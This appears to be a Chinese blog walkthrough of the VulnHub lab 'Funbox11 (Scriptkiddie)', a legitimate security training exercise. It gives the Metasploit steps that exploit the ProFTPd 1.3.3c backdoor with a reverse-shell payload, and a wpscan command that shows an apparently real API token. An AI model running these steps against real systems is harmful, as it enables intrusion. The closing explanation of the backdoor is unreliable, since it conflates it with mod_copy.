Vulnhub学习---FUNBOX:SCRIPTKIDDIE

已于 2023-12-08 13:14:37 修改
阅读量1.3k 收藏
点赞数 6
文章标签: 学习
于 2023-12-08 13:07:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjjj34/article/details/134873151
版权

目录

下载链接

靶场搭建

信息收集

端口扫描

hosts重定向

目录扫描

漏洞利用

下载链接

官方链接:VulnHub

靶场下载链接:https://download.vulnhub.com/funbox/Funbox11.ova

靶场搭建

攻击机:

靶机:

信息收集

端口扫描

nmap扫描服务,发现有很多的端口,我们先去看看80端口,访问一下网站

没有东西,我们点点蓝色字体看看里面会不会有东西。

hosts重定向

发现跳转到funbox11,那么好又是重定向,我们对/etc/hosts文件进行编辑。

刷新一下页面

目录扫描

接下来扫描一下目录

有WordPress,那么我们访问一下,并用给wpscan工具扫描一下有没有可以利用的漏洞。

wpscan --url http://funbox11/wp-admin/install.php -e --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ 

发现并没有什么可以利用的漏洞,那么我们只好先跳过这个。我们试试能不能通过其他端口进行渗透。

漏洞利用

我们先搜搜ftp有啥漏洞,没想到还真给我搜到了。

那么我们试试利用这个漏洞,进行渗透

use 0

show payload

set payload payload/cmd/unix/reverse

set rhosts 192.168.4.183

set lhost 192.168.4.50

run

直接就是root权限,完结!!!!!!!!!!!!!!!

ProFTPd-1.3.3c - Backdoor Command Execution 

 ProFTPd-1.3.3c - Backdoor Command Execution POC

这个漏洞的相关原理大家可自行上网上搜索。我就讲讲我对这个漏洞的原理的一些理解,可能有错误希望谅解。

攻击者在FTP客户端中构造一个特殊的FTP命令,其中包含恶意用户名。这个恶意用户名被设计成包含特定的字符串,能够绕过身份验证并利用mod_copy模块的后门。在ProFTPD服务器接收到这个恶意命令时,它会解析命令中的用户名,并触发mod_copy模块中的漏洞代码。这个漏洞代码会识别到恶意命令中的特殊字符串,并执行该命令,从而导致攻击者可以在服务器上执行任意命令。

在解析过程中,pr_fnvlist_parse函数会检查用户名中的特定字符串,并识别出后门代码的存在。一旦识别到后门代码的存在,攻击者构造的恶意命令中的恶意部分将被解析为可执行的命令,并在服务器上执行。

YasYs
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub--Funbox: Scriptkiddie
venu_s的博客
08-16 637
靶机介绍 Difficult: As always, it’s a very easy box for beginners. Goal: Get flag Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.0.128/24 端口扫描 nmap -sV -p- -A 192.168.0.131 nmap扫描结果 并不能用 anonymous
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
Vulnhub-FUNBOX: SCRIPTKIDDIE渗透
laoyanCZ的博客
11-30 1861
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。如果有不懂的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉靶机:本文靶机下载连接-戳我直接下载!👈由于这个这个漏洞利用成功之后,可以直接拿到root权限,所以就不涉及提权了,获取flag文件之后本靶机的渗透就结束咯PS:其实通过nmap的vuln脚本可以直接扫描出来,亲手把自己脸打了哈哈哈。
靶机渗透练习32-Funbox11-Scriptkiddie
hirak0的博客
04-18 1153
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: I
VulnHubFUNBOX: SCRIPTKIDDIE渗透
m0_73481504的博客
02-25 1024
1.需要收集信息,根据扫描出的结果做分析。2.了解使用msf渗透需要的步骤3.了解FTP的ProFTPD 1.3.3c漏洞利用。
vulnhubFunbox: Scriptkiddie
qwweggfe的博客
08-29 329
靶机ip:192.168.181.155 kali IP : 192.168.181.129 首先进行IP扫描 然后我查看ip端口开启哪些服务 我们看见他开启了80端口,于是我们打开网页进行查看 于是我进行目录探测,看看他有没有给我们一些提示 gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 于是我认为他们开...
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11(Scriptkiddie
Aluxian_的博客
09-21 1027
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第十一个靶机了 也是最后一个比较简单1.信息收集 获取ip地址 和端口信息2.metasploit的基本操作3. 了解后门命令执行漏洞这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助!至此这个系列更新完啦!🙂。
vulnhub刷题记录(Funbox: Scriptkiddie
ailx10
08-29 163
英文名称:Funbox: Scriptkiddie中文名称:FUNBOX:脚本小子发布日期:2021 年 7 月 20 日难度:容易描述:与往常一样,它对初学者来说是一个非常简单的盒子。添加到您的 /etc/hosts: funbox11下载地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 1、主机发现主机发现2、端口扫描端口扫描...
靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
qq_57976347的博客
02-18 497
一、环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二、信息收集 1.nmap命令扫描靶机 先用ifconfig查看kali的IP,因为kali和靶机都是NAT模式下,所以用 nmap 192.168.101.0/24 扫描得到靶机ip 再使用命令查看靶机开放的端口和协议:nmap -sV -A 192.168.101.112 2.利用扫描到端口 (1)开放21、22、8
Vulnhub 靶场】【Funbox: Scriptkiddie】【非常简单】【20210720】
惟忆
12-26 909
靶场介绍:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 靶场下载:https://download.vulnhub.com/funbox/Funbox11.ova 靶场难度:简单 发布日期:2021年07月20日 文件大小:1.3 GB 靶场作者:0815R2d2 靶场系列:Funbox 打靶耗时:1+ 小时,极其的简单。
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funbox界面需求文档-20160414.docm
05-08
funbox界面需求文档-20160414.docm
funbox:测试和工具程序
02-11
滑稽
i-FunBox 中文版 v1.96.938.649
04-27
软件介绍 iFunBox是一款小巧的iPhone, iPad 和 iPod Touch文件管理软件。无须越狱和任何破解,可以直接使用,不安装任何守护进程。 界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod...
如何学习Golang语言!
FengyangCoder的博客
06-09 398
起源与设计哲学:Go语言由Robert Griesemer、Rob Pike和Ken Thompson三位Google工程师设计,旨在解决现代编程中的一些常见问题,如编译速度、运行效率和并发编程。主要特点:Go语言的语法简单、编译速度快、运行效率高,支持静态类型和内存安全,具有垃圾回收功能,并且原生支持并发编程。
扩展学习|风险管理的文献综述汇总(持续更新向)
weixin_63253486的博客
06-10 775
本片博客主要介绍风险管理领域本人所看到的一些有意思的文章,并就风险管理领域的相关内容进行一个分享。
[ue5]建模场景学习笔记(5)——必修内容可交互的地形,交互沙(3)
qq_40128113的博客
06-09 299
5.第一想法直接clear掉,但直接clear会把想要保留的痕迹一并去除,跑起来就没有痕迹!所以不行,要做一个转载,先把痕迹保留在一个载体上,清楚原来痕迹,用sandsave表示,再把这个载体的痕迹保存回原来rt,这样之前的痕迹被清空了,只留下了保存在载体上的部分,正好符合我们想要的部分。我们现在已经能够让这片地形出现在任意地方,只要角色走在这片地形上,就能够产生痕迹,但这片区域总是需要人工指定,又无法把这片区域无限扩大(显存爆炸),因此尝试使角色无论走到哪里都能产生痕迹。否则绘制不到画板上。
Qt---pro文件的学习
最新发布
weixin_51883798的博客
06-11 428
【代码】Qt---pro文件的学习
FUNBOX: UNDER CONSTRUCTION!
08-16
它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值